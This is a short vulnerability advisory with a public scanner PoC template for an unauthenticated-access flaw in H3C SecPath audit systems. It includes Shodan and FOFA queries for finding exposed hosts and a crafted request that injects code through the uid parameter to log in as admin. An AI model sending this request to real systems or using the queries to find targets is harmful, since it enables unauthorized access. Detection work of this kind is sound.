h3csecparh-unauthorized-login: H3C Server - Unauthenticated Access

Date: 2025-08-01 | Affected software: H3C Server | PoC: public

Vulnerability description

The H3C server could be accessed with no authentication requirements in place.

shodan: http.html:"H3C-SecPath-运维审计系统"
fofa: app="H3C-SecPath-运维审计系统" && body="2018"

PoC code [public]

id: h3csecparh-unauthorized-login

info:
  name: H3C Server - Unauthenticated Access
  author: Print1n(http://print1n.top)
  severity: high
  description: |-
    H3C server was able to be accessed with no authentication requirements in place.
    shodan: http.html:"H3C-SecPath-运维审计系统"
    fofa: app="H3C-SecPath-运维审计系统" && body="2018"
  tags: h3c,default-login,unauth
  created: 2023/06/17

rules:
  r0:
    request:
      method: GET
      path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
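    # Matches when the status is 200 and the body contains all three markers:
    # '错误的id' ("wrong id"), '审计管理员' ("audit administrator") and 'admin'.
    expression: |
      response.status == 200 &&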
      response.body.bcontains(b'错误的id') &&
      response.body.bcontains(b'审计管理员') &&
      response.body.bcontains(b'admin')
expression: r0()
